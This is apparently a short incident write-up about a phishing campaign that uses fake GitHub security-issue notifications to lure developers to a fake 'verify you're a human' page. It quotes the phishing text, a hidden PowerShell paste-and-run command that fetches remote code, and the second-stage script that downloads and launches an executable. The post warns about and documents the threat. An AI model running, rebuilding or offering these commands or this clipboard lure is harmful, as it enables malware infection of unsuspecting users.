I received a legitimate looking email from GitHub regarding one of my repositories having a vulnerability. Seems like someone created an issue and provided a link I should follow to fix this issue (seems like it was created and then deleted).
The email is a typical issue notification with creator message:
Hey there!
We have detected a security vulnerability in your repository. Please contact us at hxxps://github-scanner.com to get more information on how to fix this issue.
Best regards,
Github Security Team
—
Reply to this email directly, view it on GitHub, or unsubscribe.
You are receiving this because you are subscribed to this thread.
—
The email header says it’s a legit email from github. A quick google search on the domain brings no result. A whois lookup shows the domain was just registered 18 of September.
Visiting the page shows a “verify you’re a human” button. Clicking that button copied the following text to clipboard and instructs the user to type Ctrl + R, Ctrl + V, ENTER (basically instructing the user to pen Run Command, paste the code and )
powershell.exe -w hidden -Command “iex (iwr ‘hxxps://github-scanner.com[/]download.txt’).Content” # “✅ ”I am not a robot – reCAPTCHA Verification ID: 93752″
The content of download.txt is the following
$webClient = New-Object System.Net.WebClient
$url1 = “hxxps://github-scanner.com/l6E.exe”
$filePath1 = “$env:TEMP\SysSetup.exe”
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\SysSetup.exe
Basically, it downloads an executable, saves it in temp as SysSetup.exe and executes it. At the time of writing, the URL was not detected as malicious by any AV even if the actual sample is (now at least 14 detect the URL as malicious)
VT of the sample
C:\Windows\Help 